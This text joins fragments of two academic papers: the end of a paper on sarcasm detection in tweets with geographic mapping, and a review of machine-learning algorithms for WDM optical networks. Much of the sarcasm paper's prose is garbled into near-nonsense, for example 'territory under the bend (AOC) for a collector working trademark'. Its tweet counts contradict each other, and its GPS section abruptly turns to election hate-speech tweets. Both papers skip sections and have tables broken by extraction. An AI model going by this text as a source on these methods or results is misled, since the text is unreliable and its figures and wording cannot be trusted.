The contents of the paper are divided into different sections. Section 3 talks about
the previous work done in sentimental analysis on sarcasm detection. Table 1 shows
different sentimental analysis on Sarcasm detection. Section 9 shows experimental
results and finally the paper is concluded in Sect. 10.
Table 1 Different sentimental analysis on sentimental analysis on sarcasm detection
S. No. Topic Author name Methodology Task Dataset Classification used
1 Sentiment analysis for Prasad et al. [1] POS training, POS To discover the Online review sites, The PBLGA algorithm
sarcasm detection on testing, PBLGA exactness of proposed media sites and other utilized 1.45 million
streaming short text testing model microblogging sites tweets as its test data
data
2 Sarcastic detection of Bharti et al. [5] POS training, POS To discover the Online review sites, The PBLGA algorithm
tweets streamed in real testing, PBLGA exactness of the media sites and other utilized 1.45 million
time testing proposed model microblogging sites tweets as its test data
3 Sarcasm detection in Kaushik and Barot [6] Support vector Identifying Sarcasm Sarcasm labeled Bag-Of-Words
sentiment analysis machine (SVM), corpus and features
logistic regression based on punctuations
such as ‘!’ and ‘?’
4 A comprehensive study Sindhu et al. [7] Data collection. Data Relating comments Twitter and Amazon Emoticons, punctuation
on Sarcasm detection pre-processing, with tag marks, quotation marks
techniques in polarity detection
sentiment analysis
5 Detection of sarcasm Mehndritta et al. [8] Data pre-processing To identify a superior Twitter Streaming API Word Tokenization,
in text data using deep and data preparation classifier among the POS tagging,
Sentimental Analysis on Sarcasm Detection with GPS Tracking
2 Literature Review
Prasad et al. [1] suggested a system to identify sarcastic and non-sarcastic tweets
dependent on the lingo and emoticons utilized in tweets. Their main concern was
on the quality of lingo and emoticons word reference. At that point these qualities
are contrasted and diverse arrangement calculations like random forest, gradient
boosting,
Log R adaptive boost, Gaussian Naïve Bayes to distinguish the sarcastic tweets
from the Twitter Streaming API. The best arrangement calculation is thought of and
joined along various pre-processing and separating strategies utilizing emoticon and
slang word reference planning to provide best proficiency.
Parveen and Deshmukh [2] the authors proposed an algorithm to distinguish the
sarcastic comments on twitter utilizing simple vector machine (SVM), maximum
entropy algorithms. At first, authors divided their work as in to two datasets which
were afore adding the sarcastic tweets in the instruction data and the other was
later adding the sarcasm to the instruction data. Tagging was done utilizing Penn
tree bank to even every word with its related linguistic form. The creators separated
highlights identified with sentiment, punctuation, syntactic and design and so on with
the help of information data. After separating highlights, arrangement is finished by
utilizing SVM, and maximum entropy calculations. Contrasted with these calcula-
tions, maximum entropy gives higher precision when contrasted with support vector
machine formula.
Jain et al. [3] suggested a system using the random forest algorithm along with
weighted ensemble algorithms for identifying the sarcastic tweets with the help
of a pragmatic classifier for the detection of emotion-based sarcasm. Bestow the
author wants to tell that sarcasm is nothing, but the combination of positive as well
as attachment to a negative sentiment or adhere with a pessimistic circumstances.
Definitiveness as well as accurateness is examined for the calculation of adequacy
in random forest classifier and weighted ensemble algorithms, whereas the two gave
the same accuracy when compared in the end.
Manohar and Kulkarni [4] the creators proposed another methodology for sarcasm
recognition as NLP and Corpus-based methodology. Author’s goal was to understand
that why a client is willing to use a sarcastic comment instead of just writing an honest
feedback. Authors gathered the tweets from the Twitter site, whereas implemented
the NLP methods like tokenization, grammatical features (PoS) and lemmatization.
NLP procedures on tweets were tested to retrieve activity words. While getting the
activity words which were retrieved from the tweets, words are coordinated with the
collection of sarcasm information utilizing semantic coordinating and diagram based
coordinating, while giving an average of sarcasm considering the tweets data. With
this average, the severity of sarcasm considering the tweets data were analyzed.
Sentimental Analysis on Sarcasm Detection with GPS Tracking 637
3 Related Researches
With progresses in data mining and substance mining figuring’s joined with the
colossal number of substance data being made each day, on a wide scope of electronic
life organizes in this twitter. The probability of governments trying to inspect ends
and presumptions is a lot of possible this time than at some other time. Table 1,
shows the different sentimental analysis of sarcasm detection with their task, dataset,
classification and methodology.
5 Proposed Architecture
The tweets were accumulated which were 16,000 sarcastic tweets and 16,000
non-sarcastic tweets for testing sarcasm in Sentimental analysis.
7 Evaluation
A. Verification input
Information being used in the experiment was taken through twitter with an
official email. The total information data that we gathered were 27,000 in which
we distributed 13,000 as sarcastic tweets and 14,000 as real tweets. In this, we
took 65% as our practice data and 35% as experimentation data.
B. Assessment outcomes
The datasets [11] were assessed by taking in light of the classifiers used. The clas-
sifiers that we will be using here are support vector classification, logistic regression,
Naïve Bayes classification and decision tree.
Classification. For assessing our conclusion, we are using a standard heuristic
which are the territory under the bend (AOC) for a collector working trademark and
(ROC) bend for all arrangements.
(1) Support Vector Classification
We are using SVM for separating our data into two parts, i.e., positive comments
and negative comments with a hyperplane, it will create two margin lines which will
have some distance so it will be easily separable for both the classification points.
Given a set of training experiment each marked as belonging to one or the other
two categories which were sarcastic and non-sarcastic tweets.
Support vector machine training algorithm build a model that designs new
experiment to one category or another dividing it into two different parts (Fig. 2).
640 M. Sharan and M. Ravinder
We are creating a decision tree with the datasets that we have collected. The target
attributes here will be negative comments (Figs. 4 and 5).
We have analyzed sarcastic and non-sarcastic tweets and utilize ROC bend for
every classifier.
(5) GPS Tracking
The guide utilizes an area remainder which, “demonstrates each a lot of political
race hate speech tweet comparative with its all-out number of tweets.”
Seven turned gray out states has no racist tweets. Strangely, the greater part of
those seven appear to be states that have lower Twitter use than the rest.
Six of the dark states (Alaska, Idaho, S. Dakota, Wyoming, Montana and Hawaii)
had an exceptionally low number of tweets in general—albeit one (Rhode Island)
had a noteworthy number of tweets (Fig. 6).
8 Testing Method
In the testing phase, we formed the gain which tells the total outcome, so if any one
algorithm the tweets occurs as sarcastic comments then we do not need to check the
other algorithms, they will automatically announce that tweet is a sarcastic tweet
saving time and efficiency. After getting the sarcastic tweets, finally the plotting
is done through the GPS tracking system which will show the area prone to more
sarcastic tweets.
9 Results
Sentimental analysis in sarcasm detection in social media shows how current person’s
opinion is about in any real time event or trends. In this paper, different algorithms
were compared and the classifier which gave the best outcome is the support vector
machine. The tweets with sarcastic comments were then processed in GPS locator
which tells us the exact area from where the sarcastic comments were the most.
In future, we can find the sarcastic comments of tweets which uses hashtags and
emoticons. Emoticons are generally used in the comment box to portray the emotions
of a person, but to know whether it is a positive or a negative comment it is a strenuous
task.
References
1. Prasad, A. G., Sanjana, S., Bhat, S. M., & Harish, B. S. (2017). Sentiment analysis for
sarcasm detection on streaming short text data. In 2nd International Conference on Knowledge
Engineering and Applications. IEEE.
2. Parveen, S., & Deshmukh, S. N. (2017). Opinion mining in twitter-sarcasm detection.
International Research Journal of Engineering and Technology (IRJET), 04(10), 201–204.
3. Jain, T., Agrwal, N., Goyal, G., & Agarwal, N. (2017). Sarcasm detection of tweets: a
comparitive study. In Tenth International Conference on Contemporary Computing (IC3).
IEEE.
4. Manohar, M. Y., & Kulkarni, P. (2017). Improvement sarcasm analysis using NLP and corpus
based approach. In International Conference on Intelligence Computing and Control Systems
(ICICCS). IEEE.
5. Bharti, S. K., Vachha, B., & Pradhan, R. (2016). K babu and S Jena. Sarcastic Sentiment
Detection in tweets streamed in real time: A Big data approach, Digital Communications and
Networks, 2(3), 108–121.
6. Kaushik, S., & Barot, M. P. (2016). Sarcasm detection in sentiment analysis. IJARIIE, 2(6).
ISSN(O)-2395-4396.
7. Sindhu C, G Vadiyu Mandala, Vishal Rao, A comprehensive study on Sarcam detection
techniques in sentiment analysis” Research gate, June 2018
8. Mehndiratta, P., Sachdeva, S., Soni, D. (2017). Detection of sarcasm in text data using deep
convolutional neural networks. Scalable Computing: Practice and Experience, 18(3).
9. Tungthamthiti, P., Shirai, K., & Mohd, M. (2017). Recognition of sarcasm in tweets based
on concept level sentiment analysis and supervised learning approaches. In 28th Pacific Asia
Conference on Language, Information and Computational (pp. 403–413).
10. Bhattacharyya, P. (2018). Sarcasm detection: A Computational and Cognitive study. CSE dept,
IIT Bombay and IIT Patna, Jan 2018.
11. www.internetlivestats.com/twitter_statistics/.
12. https://www.analyticsvidhya.com/blog/2017/09/naive-bayes-explained/.
13. Buscaldi, D., Rosso, P., & Reyes, A. (2013). From humour recognition to irony detection: The
figurative language of social media. Data & Knowledge Engineering April 2013
14. Barbieri, F., & Saggion, H. (2014). Automatic detection of irony and humour in twitter. In
Proceedings of the student Research Workshop at the 14th Conference of the European Chapter
of the association for Computational Linguistics (pp. 56–64). Gothenburg, Sweden.
15. Bifet, A., & Frank, E. (2015). Sentiment knowledge discovery in twitter streaming data. In
Discovery Science (pp. 1–5).
644 M. Sharan and M. Ravinder
16. Forslid, E., & Wiken, N. (2015) Automatic irony-and sarcasm detection in social media.
ISSN:1401-5757 uptec f15 045.
17. Bamman, D., & Smith, N. A. (2016). Contextualized sarcasm detection on twitter. School of
Computer Science, Carnegie Mellon University
18. Joshi, A., Sharma, V., & Bhattacharyya, P. (2016). Harnessing context incongruity for sarcasm
detection. Res Gate 69–53.
19. Bindra, K. K., et al. (2016). Tweet Sarcasm: Mechanism of sarcasm detection in twitter.
International Journal Of Computer Science and Information Technologies (IJSCSIT), 7(1).
20. Mukherjee, S., & Bala, P. K. (2017). Detecting sarcasm in customer tweets : An NLP based
approach. Industrial Management & Data Systems, 117(6), 1109–1126.
21. Sreelakshmi, K., & Rafeeque, P. C. (2018). An effective approach for detection of sarcasm in
tweets. In International CET Conderence on Control, Communication and Computing (IC4)
(pp 337–382), IEEE, July 05–07.
22. Arora, M., & Kansal, V. (2019). Character level embedding with convolution neural network
for text normalization of unstructured data for twitter sentiment. Social Network Analysis and
Mining, 9(1), https://doi.org/10.1007/S13278-019-0557-Y, 2019.
Impact of Machine Learning Algorithms
on WDM High-Speed Optical Networks
Abstract This paper focuses on comparing the various machine learning (ML) algo-
rithms that can be applicable in wavelength division multiplexing (WDM) optical
networks to provide better simulation outcomes. ML, combined with WDM optical
networks, helps in network control and resource management that are useful in
service provisioning and resource assignment. This paper gives a comprehensive
review of machine learning approaches in WDM optical networks concerning support
vector machine (SVM), K-nearest neighbour (K-NN), decision tree, random forest
and neural networks algorithms. These algorithms’ performances are compared in
terms of accuracy and AUC; further, the accuracy and AUC results show an average
outcome of 99% and 0.98, respectively. Simulation can be performed on MATLAB
and Net2plan tools using different data sets in terms of average accuracy and AUC for
WDM optical networks. This research’s future directions can be towards ML utiliza-
tion to provide optimal routing and wavelength assignment, increasing bandwidth
utilization to reduce control overheads, reduce computational complexity, security,
fault occurrence and monitoring schemes for WDM optical networks supporting 5G
applications.
1 Introduction
Machine learning is a technology that provides the system with the capability of
learning and improving automatically from experiences. The computer programs
are designed through machine learning in such a way that the data can be accessed
and learned on their own. It is a branch of artificial intelligence that is gaining huge
popularity in today’s technology [1]. The machines can execute the intellectual tasks
that were traditionally solved by humans through machine learning technology that
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 645
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_52
646 S. Rai and A. K. Garg
provides complex mathematical and statistical tools. In all the networking fields, the
idea of automating complex tasks has been of great interest since the machines can
be given the tasks of designing and operating communication networks [2]. Also,
the implementation of deep learning algorithms, especially convolutional neural
networks (CNN), brings huge benefits to the medical field, where a huge number
of images are to be processed and analysed [3]. This paper focuses on reviewing
the applications of ML in optical networking-based technologies. Supervised and
unsupervised are the two commonly known types of machine learning algorithms.
A hybrid of supervised learning and unsupervised learning is introduced as semi-
supervised learning. Apart from these, [4] few other machine learning algorithms
are explained further.
(1) Supervised learning: The algorithm that trains the machine using examples,
also known as instances, is known as supervised learning. Training and Test
are the two sets of data provided for learning through this method. A training
set includes instances of input and output. These instances are used to discover
patterns relevant to new inputs and outputs given to the machine [5]. Supervised
learning is distinguished in classification and regression. Classification maps
the input space into pre-defined classes. The regression approach maps input
space across the real-value domain [6]. The most commonly used supervised
learning algorithms are:
(a) Decision Tree: The algorithm that groups the attributes by sorting them
based on their values is known as a decision tree. There are nodes and
branches available in each tree. Each node represents attributes in a group
that is to be classified. A value that is assigned to the node is repre-
sented by each branch. The general implementation of the decision tree
algorithm is presented in Fig. 1.
(b) Naïve Bayes: The text classification industry mostly uses Naïve Bayes
algorithm for classification and clustering. It works on the principle of
conditional probability.
(c) Support Vector Machine: This is another most widely used machine
learning algorithm which is applied mainly in classification. Margin
calculation is the basic principle of this algorithm [7]. Margins are drawn
in between the classes in such a manner that there is the maximum
distance in between the margin and classes, as a result of which the
classification error is minimum.
(2) Unsupervised learning: It is the algorithm that includes the unlabelled input
with desired outputs. The input points closer to each other can be clustered
by this type of algorithm. The most commonly used unsupervised learning
technique viz. a) K-Means Clustering b) Principal Component Analysis [8].
(a) K-Means Clustering: In this technique, groups are created automatically
when applying clustering learning. A cluster includes items with similar
characteristics. Since k-distinct clusters are created, this algorithm is
known as k-means.
Impact of Machine Learning Algorithms on WDM … 647
points and predicted labels are added together, and further, the process
is iterated. The name of this classifier is self-training since it performs
learning on its own.
(b) Transductive SVM: This is an extension to the SVM algorithm. Both
labelled and unlabelled data are included in TSVM. In a manner that
the margin between the labelled and unlabelled data is maximum, the
unlabelled data is labelled [10].
(4) Reinforcement learning: The algorithm that uses observations from the
surrounding environment by interacting with it to take actions that would
increase the reward or reduce the risks is known as reinforcement learning.
(5) Neural Network Learning: It is also commonly known as artificial neural
network (ANN). This algorithm is designed on the basic concept of neurons
residing in the human brain. There are three layers in this algorithm. The input
is given to the input layer. The input is processed by the second layer, known
as the hidden layer. Finally, the calculated output is forwarded to the output
layer.
(6) Ensemble Learning: This algorithm combines different individual learners to
generate only one learner. This individual learner can be any of the above-
mentioned learners such as neural network, decision tree or naïve Bayes [11].
The experimental simulations have shown that the performance of collective
learners is always better as compared to that of one individual learner.
As shown in Fig. 1, the values of only one attribute are considered at a time by the
decision tree algorithm to create a tree model. The dataset on attribute value is sorted
initially by the algorithm. In the next step, the regions in a dataset which clearly
include only one class are identified. These regions are then marked as leaves. The
algorithm chooses another attribute for the remaining regions, which have more than
one number of classes. Only with the number of instances present in these regions,
the branching process is continued.
The process works iteratively until no attributes are left to generate leaves or until
all the leaves possible in those regions are generated. The pseudo-code of the optimal
decision tree algorithm is presented below:
Input: Data Partition, D // Defines set of training tuples, and their associated class
labels.
attribute_list // Defines candidate attributes set.
.attribute_selection_method // the best criterion that can be applied for partitioning
data tuples among individual classes is determined.
Output: A decision tree.
Algorithm:
• Create a node N;
• if all the tuples in D belong to similar class C, then
return N as a leaf node labeled with class C;
• if attribute_list is empty, then
return N as a leaf node labeled with majority class in D; // majority voting
Impact of Machine Learning Algorithms on WDM … 649
monitoring the performance of physical layer link, signal and failure management
[16].
Figure 2 shows the general system architecture of optical networks incorporating
machine learning techniques. This system deploys an intelligent module that includes
functional elements (FEs) and ML agents. FEs help in performing interactions among
the ML agent and optical networks. In this process, the raw data is first collected
from the optical network in the data collection module. Further, this data is pre-
processed to certain data structure through data processing module [17] so that it
can be used for training ML models. For supporting FE on network data collection
and processing, network protocols and functions are required to be improved. The
next step is to train the data which is done by forwarding this pre-processed network
data to the ML agents. There are three important paradigms of optical networks in
which the ML agent generally works [18]. They are: regression, classification and
decision-making. To solve the regression and classification problems, supervised and
unsupervised learning are applied. Iterative optimization is performed using learning
algorithms with training datasets to determine the ML model parameters as shown
in Fig. 2a. The methods that enhance the model performance are known as learning
algorithms. The optimal strategy is learned by the ML models in the decision-making
tasks by interacting with the environment which here is the optical network as shown
in Fig. 2b. Depending upon the performance of action, the algorithm receives a
reward in such networks. It is then possible to update the decision-making problems
using such rewards in new strategies. For most of the decision-making problems,
reinforcement learning methods are applied [19].
A leading infrastructure provider for the information and communication tech-
nology industry that supports the demand of accommodating growth in mobile traffic
and the varieties of new services that have diverse requirements is designed known
as WDM. It is important to include ML in making WDM vision conceivable consid-
ering the increase in complexity of networks and evolvement of new use cases with
time. This technology ensures that in comparison to previous technologies, the users
are provided with higher security, reliability and flexibility.
The paper is organized as follows. Section 1 introduces the basic concept of
machine learning in context to WDM optical networks. Section 2 describes the
previous research work in the development of WDM high-speed optical networks.
Section 3 outlines the performance parameters. Section 4 explains the performance
outcomes of existing techniques. Finally, we conclude the research paper with future
scope in Sect. 5 and 6, respectively.
2 Literature Survey
Gao et al. (2020) reviewed the different problems solved using machine learning
methods [21]. There are still many challenges being faced when applying ML tech-
niques to optical networks, although several advancements have been made on this
technology. The four typical applications that included AI techniques which are
power optimization, failure management, routing and wavelength assignment (RWA)
and low-margin design were reviewed in this paper. It was seen that in terms of reli-
ability and capacity, the performances of these applications were enhanced when
applying ML. Thus, the review outlined the possible challenges and future research
directions for optical networks using ML techniques.
Gu et al. (2020) presented a survey for intelligent optical networks applying ML.
Based on their use cases, the applications of ML were categorized [20]. Resource
management, optical networks monitoring and survivability and optical network
control were the common categorizations. Based on the ML techniques used, the use
652 S. Rai and A. K. Garg
cases were analysed and compared. Depending on such previous analysis, the new
motivations were derived. Additionally, this survey also discussed the challenges and
possible solutions for intelligent optical networks using ML.
Panayiotou et al. (2020) examined the different ML-based frameworks designed
to achieve QoT [22]. Since the requirements of QoTs are diverse, it was important
to identify appropriate frameworks. It was seen that particularly with the increase
in the number of diverse QoT requirements, distributed QoT model’s performance
was better compared to centralized ones. Additional QoS could be achieved in the
ML-based optical frameworks by analysing centralized and distributed frameworks
in terms of management and efficiency control.
Khan et al. (2020) proposed that for fibre-optic communication systems, the ML
techniques would provide unique and powerful signal processing tools [23]. For
resolving challenges that could not be handled using traditional approaches, ML
and big data analytics could provide better outcomes for optical networks, which
are growing with speed and are being more dynamic and software-defined. Thus, in
optical communications and networking, ML-based knowledge skills proved to be
highly beneficial.
Yang et al. (2020) proposed a new mechanism for achieving zero-touch operation
in optical network architecture [24]. Without any manual interference, the mainte-
nance and intent-based network operation-based issues could be resolved through
this approach. In optical network automatic operation, the functional entities of
architecture and interworking process were studied in this research. Experiments
were conducted, and the outcomes achieved showed that the intent translation and
zero-touch configuration were performed effectively. The zero-touch configuration
operation was protected by two closed loops, which included closed-loop policy and
closed-loop intent.
Hindia et al. (2020) proposed a comparative analysis of cognitive radio (CR)-based
technology in WDM technology [25]. Based on spectrum allocation methods, the
impact and roles of MAC layer in spectrum sensing and sharing were presented in this
research. The various intelligent routing protocols viable were analysed. The research
showed that the primary motivation of future research could be the issues related to
reduction in spectrum and lower usage of resources. For future WDM networks, the
CR technology could maximize the usage of highly unused communication spectrum
bands.
Troia et al. (2019) proposed research in which the dynamic SFC resource alloca-
tion was applied for software defined network (SDN)-based optical networks using
reinforcement learning (RL) [26]. For optimizing the resources allocation in multi-
layer networks, an RL system was designed in this research. Provided the state
of network and historical traffic traces, the decision of reconfiguring service func-
tion chains (SFCs) was made by RL agents. The proposed method was compared
with a rule-based optimization design which showed that the proposed method
provided better outcomes. The sudden changes in traffic shape were predicted, and
the reconfiguration of SFCs was triggered using this method.
Musumeci et al. (2019) presented a study of the optical communication and
networking approaches using ML [27]. A survey of relevant studies was conducted in
Impact of Machine Learning Algorithms on WDM … 653
Wang et al. (2018) proposed research in which a hybrid method was identified as
channel coding for WDM communications in enhanced mobile broadband (eMBB)
scenario to support the polar codes for the LDPC codes and control plane [33].
Designing the powerful decoders at the terminal side was the major challenge faced in
this research. By concatenating an indicator section, a deep learning-based LDPC was
proposed here. A comparative evaluation was performed to evaluate the performances
of traditional and newly designed methods. The implementation resources were saved
here since the proposed unified approach applied similar network architecture and
parameters.
Fagbohun (2014), proposed a study in which the devices with effective connection
and communication services were provided with new ML technology with the aim
of increasing the flexibility of network connectivity and providing supporting capa-
bility [34]. The communication-related issues were not resolved using traditionally
designed techniques. Wireless technology has risen to a new level with the involve-
ment of WDM. These systems would work on providing simple network scenarios
with more functionality to the end nodes. The future concepts of mobile communica-
tion would link the multiple diverse research approaches being designed to provide
improvement in this field (Table 1).
3 Performance Parameters
[20] Panayiotou, et al. 2020 Since the requirements of QoTs It was seen that particularly with QoS could be achieved in the
are diverse, it was important to the increase in number of diverse ML-based optical frameworks
identify appropriate frameworks. QoT requirements, the by analysing centralized and
Depending upon the training time performance of distributed QoT distributed frameworks in
and accuracy, the simulations models was better as compared to terms of management and
were performed centralized ones efficiency control
[21] Khan et al. 2020 For resolving challenges which Thus, in optical communications The computational
could not be handled using and networking, ML-based complexity of ML algorithms
traditional approaches, the ML knowledge skills proved to be was not discussed in this
and big data analytics could highly beneficial paper which could be a
provide better outcomes for motivation to extend this
optical networks which are research in future
growing with speed and are being
more dynamic and
655
software-defined
(continued)
Table 1 (continued)
656
Ref. No. Authors names Year of publication Proposed technique Result outcomes Limitations and future scope
[22] Yang, Zhan, et al. 2020 A new mechanism was proposed The zero-touch configuration There was a huge reality gap
for achieving zero-touch operation was protected by two between the simulation and
operation in optical network closed loops real networks which could be
architecture. Without any manual used as a motivation to extend
interference, the maintenance and this research in future
intent-based network
operation-based issues could be
resolved through this approach
[23] Hindia et al. 2020 A comparative analysis of The research showed that the For future WDM networks,
cognitive radio (CR)-based primary motivation of future the CR technology could
technology in WDM technology research could be the issues maximize the usage of highly
was presented. Based on related to reducing spectrum and unused communication
spectrum allocation methods, the underutilization of resources spectrum bands
utilization of MAC was presented
in this research
[24] Troia et al. 2019 The dynamic SFC resource The outcomes showed a rapid The computational
allocation was applied for variation in the traffic as well as complexity of ML algorithms
SDN-based optical networks triggering of reconfiguration of was not discussed in this
using RL. For optimizing the SFCs paper which could be a
resources allocation in motivation to extend this
multi-layer networks, an RL research in future
system was designed
[25] Musumeci et al. 2019 A survey of relevant studies was New possible research directions The computational
conducted in this research and an were outlined through this complexity of ML algorithms
introductory tutorial on ML was research for providing ease in was not discussed in this
performed to help researchers in further research simulations research. This could be used
future research. Applying ML in in a future direction to extend
optical networks is very new this research
even though several researches
S. Rai and A. K. Garg
memory network was designed allocations were reduced by 75% research. This could be used a
and implemented in this research by applying this proposed future direction to extend this
using deep learning algorithm approach research
[28] Casellas et al. 2018 A novel architecture was For covering the metropolitan The computational
proposed for providing automatic networks that were an interface complexity of ML algorithms
deploying in WDM services with WDM using optical was not discussed in this
being applied in metropolitan networks, the WDM services paper which could be a
networks. For allowing an were deployed to provide control, motivation to extend this
interface among WDM as well as management and orchestration research in future
optical networks, this research
was proposed
[9] Morais et al. 2018 The effectiveness of different ML With accuracies of 99%, the The future concepts of mobile
models was evaluated. Predicting ANNs provided the best communication would link
the QoT of a lightpath and generalization. Further, the the multiple diverse research
657
increasing the speed of lightpath residual margin with average approaches being designed to
provisioning were the goals of error less than 0.4 dB was provide improvement in this
this research predicted through ANNs field
(continued)
Table 1 (continued)
658
Ref. No. Authors names Year of publication Proposed technique Result outcomes Limitations and future scope
[30] Pelekano et al. 2018 A novel approach was proposed The conducted experiments and There was a huge reality gap
in which less-complex ML achieved results showed that the in between the simulation and
techniques were applied to design performances of systems real networks which could be
optimal online WDM service including highly complex but used a motivation to extend
provision frameworks. For accurate ILP approach and the this research in future
making optimal decisions, neural ones including NN-based
networks (NNs) were applied real-time service, were very
similar
[31] Wang et al. 2018 A hybrid method was identified The implementation resources This research did not focus on
as channel coding for WDM were saved here since the the attacks and intrusion
communications in enhanced proposed unified approach detection methods for optical
mobile broadband (eMBB) applied similar network networks applying ML
scenario. By concatenating an architecture and parameters algorithms. The future
indicator section, a deep research could focus on this
learning-based unified challenge
polar-LDPC was proposed here
[32] Fagbohun 2014 The devices with effective The communication-related The future concepts of mobile
connection and communication issues were not resolved using communication would link
services were provided with new traditionally designed techniques. the multiple diverse research
ML technology with the aim of These systems would work on approaches being designed to
increasing the flexibility of providing simple network provide improvement in this
network connectivity and scenarios with more functionality field
providing supporting capability to the end nodes
S. Rai and A. K. Garg
Impact of Machine Learning Algorithms on WDM … 659
f. False Positive Rate (FPR): The fraction of negative samples within the test set
that are classified incorrectly as positive are represented by FPR.
Table 2 Comparative
Performance parameter CBR [33] RF[34] SVM [35]
analysis of various techniques
in terms of accuracy and AUC Accuracy 99% 97% 99.15%
AUC 0.97 0.98 0.9909
660 S. Rai and A. K. Garg
Fig. 3 Comparison of ML
algorithms in terms of
accuracy
5 Conclusion
6 Future Scope
This review also outlines the future directions through which this technology can be
improved. ML algorithms used in optical networks make them vulnerable to various
security attacks and intrusions. To maintain the data integrity, future research could
Impact of Machine Learning Algorithms on WDM … 661
provide more reliable and secure techniques. Additionally, the new approaches could
emphasize on maximizing the usage of highly unused communication spectrum
bands in optical networks.
References
1. Liu, J., Wang, G., Hu, P., Duan, L. Y., & Kot, A. C. (2017). Global context-aware attention
LSTM networks for 3D action recognition. In Proceedings—30th IEEE Conference Computer
Vision Pattern Recognition, CVPR 2017 (vol. 2017-Janua, pp. 3671–3680). https://doi.org/10.
1109/CVPR.2017.391.
2. Zibar, D., Piels, M., Jones, R., & Schaeffer, C. G. (2015). Machine learning techniques in
optical communication. https://doi.org/10.1109/ECOC.2015.7341896.
3. Tiwari, P., et al. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems
Research, 52, 1036–1044. https://doi.org/10.1016/j.cogsys.2018.08.022
4. Pan, C., Henning, B., Idler, W., Schmalen, L., & Fellow, F. R. K. (2015). Optical nonlinear-
phase-noise compensation for a code-aided expectation-maximization algorithm (no. July,
pp. 1–8).
5. Xu, R., & Wunsch, D. (2005). Survey of clustering algorithms. IEEE Transactions on Neural
Networks, 16(3), 645–678. https://doi.org/10.1109/TNN.2005.845141
6. Song, C., Zhang, M., Huang, X., Zhan, Y., Wang, D., Liu, M. (2018). Machine learning enabling
traffic-aware dynamic slicing for 5G optical transport networks. [Online]. Available: https://
www.osapublishing.org/oe/viewmedia.cfm?uri=oe-21-12-14859&seq=0.
7. Macaluso, I., Finn, D., Ozgul, B., & Dasilva, L. A. (2013). Complexity of spectrum activity and
benefits of reinforcement learning for dynamic channel selection. IEEE Journal on Selected
Areas in Communications, 31(11), 2237–2248. https://doi.org/10.1109/JSAC.2013.131115
8. Ye, H., Li, G. Y., & Juang, B. H. (2018). power of deep learning for channel estimation and signal
detection in OFDM systems. IEEE Wireless Communication Letter, 7(1), 114–117. https://doi.
org/10.1109/LWC.2017.2757490
9. T. J. O’Shea, Erpek, T., & Charles Clancy, T. (2017) Deep learning-based MIMO communi-
cations. arXiv, pp. 1–9.
10. Thrane, J., Wass, J., Piels, M., Diniz, J. C. M., Jones, R. T., & Zibar, D. (2017). Machine
learning technique for optical performance monitoring from directly detected PDM-QAM
signals. Journal of Lightwave Technology, 35(4), 868–875.
11. Angelou, M., Pointurier, Y., Careglio, D., & Spadaro, S. (2012). Optimized monitor placement
for accurate QoT assessment in core optical networks. Journal of Optical Communications
and Networking, 4(1), 15–24. [Online]. Available: https://www.osapublishing.org/oe/abstract.
cfm?uri=oe-18-2-670.
12. Karim, M., & Rahman, R. M. (2013). Decision Tree and Naïve Bayes Algorithm for Classi-
fication and Generation of Actionable Knowledge for Direct Marketing. Journal of Software
Engineering and Applications, 06(04), 196–206. https://doi.org/10.4236/jsea.2013.64025
13. Sartzetakis, I., Christodoulopoulos, K., Tsekrekos, C. P., Syvridis, D., & Varvarigos, E. (2016).
Quality of transmission estimation in WDM and elastic optical networks accounting for space-
spectrum dependencies. Journal of Optical Communications and Networking, 8(9), 676–688.
https://doi.org/10.1364/JOCN.8.000676
14. Pointurier, Y., Coates, M., & Rabbat, M. (2011). Cross-layer monitoring in transparent optical
networks. Journal of Optical Communications and Networking, 3(3), 189–198. https://doi.org/
10.1364/JOCN.3.000189
15. Sambo, N., Pointurier, Y., Cugini, F., Valcarenghi, L., Castoldi, P., & Tomkos, I. (2010). Light-
path establishment assisted by offline QoT estimation in transparent optical networks. Journal
of Optical Communications and Networking, 2(11), 928–937. https://doi.org/10.1364/JOCN.
2.000928
662 S. Rai and A. K. Garg
16. Barletta, L., Giusti, A., Rottondi, C., & Tornatore, M. (2017). QoT estimation for unestablished
lighpaths using machine learning. In 2017 Opt. Fiber Commun. Conf. Exhib. OFC 2017 - Proc.,
pp. 5–7, 2017, doi: https://doi.org/10.1364/ofc.2017.th1j.1.
17. Seve, E., Pesic, J., Delezoide, C., Bigo, S., & Pointurier, Y. (2018). Learning process for
reducing uncertainties on network parameters and design margins. Journal of Optical Commu-
nications and Networking, 10(2), A298–A306. https://doi.org/10.1364/JOCN.10.00A298
18. Panayiotou, T., Ellinas, G., & Chatzis, S. P. (2016). A data-driven QoT decision approach
for multicast connections in metro optical networks. In 2016 International Conference on
Optical Network Design and Modeling ONDM 2016, no. Dec 2017, 2016 https://doi.org/10.
1109/ONDM.2016.7494074.
19. Panayiotou, T., Chatzis, S. P., & Ellinas, G. (2017). Performance analysis of a data-driven
quality-of-transmission decision approach on a dynamic multicast- capable metro optical
network. Journal of Optical Communications and Networking, 9(1), 98–108. https://doi.org/
10.1364/JOCN.9.000098
20. Gu, R., Yang, Z., & Ji, Y. (2020). Machine learning for intelligent optical networks: A compre-
hensive survey. Journal of Networking Computer Application, 157. https://doi.org/10.1016/j.
jnca.2020.102576.
21. Gao, R., et al. (2020). An overview of ML-based applications for next generation optical
networks. Science China Information Sciences, 63(6), 1–16. https://doi.org/10.1007/s11432-
020-2874-y
22. Panayiotou, T., Savva, G., Tomkos, I., & Ellinas, G. (2019). Centralized and distributed machine
learning-based QoT estimation for sliceable optical networks. arXiv.
23. Khan, F. N., Fan, Q., Lu, C., & Lau, A. P. T. (2019). Machine learning methods for optical
communication systems and networks. Elsevier Inc.,.
24. Zhan, K., et al. (2020). Intent defined optical network: Toward artificial intelligence-based
optical network automation. In Optics InfoBase Conference Papers (vol. Part F174-, no. June,
pp. 1–12, 2020). https://doi.org/10.1364/OFC.2020.T3J.6.
25. Hindia, M. N., Qamar, F., Ojukwu, H., Dimyati, K., Al-Samman, A. M., & Amiri, I. S.
(2020). On Platform to Enable the Cognitive Radio Over 5G Networks. Wireless Personal
Communications, 113(2), 1241–1262. https://doi.org/10.1007/s11277-020-07277-3
26. Troia, S., Alvizu, R., & Maier, G. (2019). Reinforcement learning for service function chain
reconfiguration in NFV-SDN metro-core optical networks. IEEE Access, 7, 167944–167957.
